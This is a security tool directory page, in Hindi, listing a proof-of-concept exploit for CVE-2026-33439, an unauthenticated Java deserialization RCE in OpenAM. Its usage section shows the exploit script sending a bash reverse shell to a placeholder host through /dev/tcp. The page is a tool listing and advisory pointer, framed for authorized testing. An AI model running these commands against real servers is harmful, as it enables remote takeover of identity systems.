Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-33439-Poc — Proof of concept for CVE-2026-33439, an unauthenticated RCE in OpenAM via Java deserialization | Kitploit
उपकरण/GitHubGitHub/rh33t/cve-2026-33439-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubrh33t/cve-2026-33439-poc

CVE-2026-33439-Poc

Proof of concept for CVE-2026-33439, an unauthenticated RCE in OpenAM via Java deserialization

रिपॉजिटरी देखें
6011 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-33439

OpenIdentityPlatform OpenAM में jato.clientSession पैरामीटर के असुरक्षित Java डीसेरिएलाइज़ेशन के माध्यम से प्री-ऑथ RCE। प्रभावित <= 16.0.5, 16.0.6 में ठीक किया गया।

सलाह: https://github.com/OpenIdentityPlatform/OpenAM/security/advisories/GHSA-2cqq-rpvq-g5qj

उपयोग

time ./cve-2026-33439.py --url https://TARGET/openam --command 'sleep 3' # takes about 3 seconds
./cve-2026-33439.py --url https://TARGET/openam --command 'bash -i >& /dev/tcp/HOST/PORT 0>&1'

आउटपुट ब्लाइंड है। कमांड समाप्त होने तक अनुरोध ब्लॉक रहता है, इसलिए टाइमिंग निष्पादन की पुष्टि करती है (--command 'sleep 5' में लगभग 5 सेकंड लगते हैं)।

केवल अधिकृत सुरक्षा परीक्षण के लिए।

टूल डाउनलोड करें